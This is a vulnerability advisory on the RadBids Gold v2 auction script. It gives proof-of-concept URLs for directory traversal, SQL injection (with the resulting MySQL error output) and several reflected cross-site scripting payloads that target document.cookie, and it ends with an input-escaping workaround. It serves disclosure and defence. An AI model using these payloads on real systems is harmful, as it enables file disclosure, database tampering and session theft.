|
Brought to you by:
Suppliers of:
|
|
|
| |
| RadBids is "a powerful php/mySQL powered ebay type of auction script". RadBids is vulnerable to multiple cross site scripting, SQL injection and directory traversal vulnerabilities. |
| |
Credit:
The information has been provided by Diabolic Crab.
|
| |
Vulnerable Systems:
* RadBids Gold v2
Proof of Concept Exploits:
Directory Transversal:
The following URL will include the arbitrary_file into the results returned by the server:
http://localhost/auciton_software/index.php?read=arbitary_file
SQL Injection:
The following URL can be used to trigger the SQL injection vulnerability:
http://localhost/auciton_software/index.php?a=listings&mode='SQL_INJECTION&order=name&cat=
The result returned will look something like:
SELECT id, area, radbids_listings.moderated, name, type, featured, hot, urgent, detailview, viewcount, COUNT(radbids_bids.pid) AS bids, AVG(radbids_bids.price) AS average, MAX(radbids_bids.dateposted) AS lastbid, radbids_listings.dateposted, UNIX_TIMESTAMP(radbids_listings.dateposted) AS pdate, UNIX_TIMESTAMP(dateexpire)-UNIX_TIMESTAMP(NOW()) AS timeleft, radbids_rate.avgrate, min_bid, bid_inc, buynow, dateawarded, listing_type FROM radbids_listings LEFT JOIN radbids_bids ON radbids_listings.id=radbids_bids.pid LEFT JOIN radbids_rate ON radbids_listings.id=radbids_rate.pid WHERE GROUP BY id ORDER BY name, dateposted DESC LIMIT 0,25
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'GROUP BY id ORDER BY name, dateposted DESC LIMIT 0,25' at line 28
SELECT id, area, radbids_listings.moderated, name, type, featured, hot, urgent, detailview, viewcount, COUNT(radbids_bids.pid) AS bids, AVG(radbids_bids.price) AS average, MAX(radbids_bids.dateposted) AS lastbid, radbids_listings.dateposted, UNIX_TIMESTAMP(dateexpire)-UNIX_TIMESTAMP(NOW()) AS timeleft, radbids_rate.avgrate, min_bid, bid_inc, buynow, dateawarded, listing_type FROM radbids_listings LEFT JOIN radbids_bids ON radbids_listings.id=radbids_bids.pid LEFT JOIN radbids_rate ON radbids_listings.id=radbids_rate.pid WHERE GROUP BY id ORDER BY name, dateposted DESC
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'GROUP BY id ORDER BY name, dateposted DESC' at line 27
Cross Site Scripting:
The following URLs can be used to inject arbitrary HTML and/or JavaScript:
http://localhost/auciton_software/faq.php?farea=%22%3E%3Cscript%3Ealert( document.cookie )%3C/script%3E
http://localhost/auciton_software/index.php?a=listings&mode=1&cat=%22%3E%3Cscript%3Ealert( document.cookie )%3C/script%3E&order=name
http://localhost/auciton_software/index.php?a=listings&mode=1&order='%3E%3Cscript%3Ealert( document.cookie )%3C/script%3E&cat=
http://localhost/auciton_software/index.php?a=myareas&area=%22%3E%3Cscript%3Ealert( document.cookie )%3C/script%3E
Workaround:
The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.
|
|
|
|
|
